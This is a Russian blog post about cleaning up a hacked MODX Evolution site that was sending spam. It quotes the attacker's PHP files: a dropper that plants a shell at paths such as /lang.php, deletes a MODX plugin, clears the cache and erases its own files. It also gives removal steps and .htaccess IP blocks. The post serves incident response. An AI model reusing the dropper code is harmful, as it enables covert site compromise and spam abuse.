MODX Evo: Массовая рассылка корреспонденции (SPAM).
Служба мониторинга сервисов хостинг провайдера известила, что один из моих сайтов рассылает спам. При проверке сайта на наличие вредоностного кода, антивирусы промолчали. Пришлось воспользоваться гуглом. По данной проблеме MODX Evo: Массовая рассылка корреспонденции (SPAM) информации набралось не так уж много. На сайте одного из MODx сообществ решался аналогичный вопрос "Похоже тоже взломали. Пошли письма". Т.е. на сайт был загружен Shell, который производил массовую рассылку СПАМА.
Похоже тоже взломали. Пошли письма.
Один из участников сообщества поделился некими ранее обнаружившимися несколькими интересными файлами через которые все это безобразие заливается.
UploadShell.php
<?php
require_once $_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/FileSettings.php';
$file = file_get_contents($filePath);
$res = file_put_contents($uploadPath, $file);
global $modx;
$pluginsTable = $modx->getFullTableName("site_plugins");
$result = $modx->db->query("SELECT id FROM $pluginsTable WHERE name = 'exp' ");
$count = mysql_num_rows($result);
if ($count > 0) {
$row = $modx->db->getRow($result);
if ($row['id']) {
$pluginDel = $modx->db->query("DELETE FROM $pluginsTable WHERE name = 'exp' ");
$eventsTable = $modx->getFullTableName("site_plugin_events");
$id = $row['id'];
$eventDel = $modx->db->query("DELETE FROM $eventsTable WHERE pluginid = $id ");
$modx->clearCache();
include_once MODX_BASE_PATH . "manager/processors/cache_sync.class.processor.php";
$sync = new synccache();
$sync->setCachepath(MODX_BASE_PATH . "assets/cache/");
$sync->setReport(false);
$sync->emptyCache();
}
}
unlink($filePath);
unlink($_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/FileSettings.php');
unlink($_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/UploadShell.php');
echo $res;
die();
FileSettings.php
<?php
# $uploadBasePath = '/manager/processors/kill.processor.php';
# $uploadBasePath = '/assets/images/logo.php';
# $uploadBasePath = '/manager/includes/lang/country/murug_country.inc.php';
$uploadBasePath = '/lang.php';
# $uploadBasePath = '/manager/media/style/MODxCarbon/images/icons/index.php'; # 7c39_0303.php
# $fileBaseName = '841rewb3v4x.php';
$fileBaseName = 'lang.php';
$uploadPath = $_SERVER['DOCUMENT_ROOT'].$uploadBasePath;
$filePath = $_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/'.$fileBaseName;
$localFilePath = '/var/www/jonin/data/www/niblocklogistics.com/retro2/protected/commands/'.$fileBaseName;
Решение
Проверить папки с путями, что указаны в коде. Удалить файлы, что указаны в коде. Файлы Shell'а содержат обфусцированый код ${"\x47L\x4f\x42\x41\x4c\x53"}["\x68u\x77\x69\x76\x63\x61\x71wk\x79\x79"] ... Так же необходимо удалить папку temp, которая лежит assets/cache/.
# $uploadBasePath = '/manager/processors/kill.processor.php';
# $uploadBasePath = '/assets/images/logo.php';
# $uploadBasePath = '/manager/includes/lang/country/murug_country.inc.php';
$uploadBasePath = '/lang.php';
# $uploadBasePath = '/manager/media/style/MODxCarbon/images/icons/index.php'; # 7c39_0303.php
# $fileBaseName = '841rewb3v4x.php';
$fileBaseName = 'lang.php';
После того, как вы удалили вредоносные файлы Shell'a. Пройдите следующую процедуру.
- Произведите BackUp всего проекта и Базы Данной.
- Обновите Вашу систему управления до последней актуальной версии.
- Смените пароль FTP доступа.
- В файл htaccess добавить правило
Order Deny,Allow
Deny from 80.243.184.227
Deny from 77.59.166.128
Deny from 146.185.239.19
Параметры getImageList MIGX
Создание страницы с ошибкой 404 в MODX Revolution
RESTful API в MODX Rrevolution
Создание тегов, меток или хэштегов в MODx
Документация по pdoCrumbs
Документация по pdoPage
Документация по pdoMenu
Настраиваем турбо-страницы Yandex в MODx Revo
Авторизация через соц.сети в MODX: hybridauth
Условия в MODx Revo сниппет IF
Документация MIGx
По шаговое обновление Modx Revolution до последней версии
Документация по pdoResources
Форматирование даты в MODx Revo
Облако тегов в MODX revolution
Перенос MODX Revolution на хостинг или с домена на домен
Настройка ЧПУ и htaccess для MODX Revolution
MODX - Добавление reCaptcha в FormIt и Login
Работа с ресурсами в MODx revolution
Вывод даты MODx Revo
Документация по getResources
Как создать карту сайта в MODX Revo
Проcтая форма обратной связи на MODx Revolution + FormIt
Как сделать меню на MODx при помощи Wayfinder
MODx Revo - поиск по сайту SimpleSearch modx
Быстрый старт в MODX Revolution
MODX Evo: Массовая рассылка корреспонденции (SPAM).
Возможно, вам будет интересно
Документация по pdoResources
Сниппет предназначен для вывода списка ресурсов. Является продвинутой заменой для getResources: обладает всеми его возможностями, но лишен недостатков. Умеет правильно сортировать ТВ параметры, присоединять таблицы при выборке, включать и исключать категории из разных контекстов и еще много чего.
Настраиваем турбо-страницы Yandex в MODx Revo
В данной статье вы узнаете что такое Турбо-страницы от Яндекс, как сделать турбо страницы на MODX Revolution пошаговая инструкция.
Вывод даты MODx Revo
В разработке функциональности блока новостей, блога и тд. чаще всего приходится использовать вывод даты публикации документа. А именно важна сама форма выводы даты.
Документация MIGx
MIGX это специальный тип дополнительных полей (TV), созданный для того чтобы объединить несколько разных TV в один. Такая система объединенных полей очень сильно упрощает администрирование сайта, когда есть необходимость заполнять много информации.
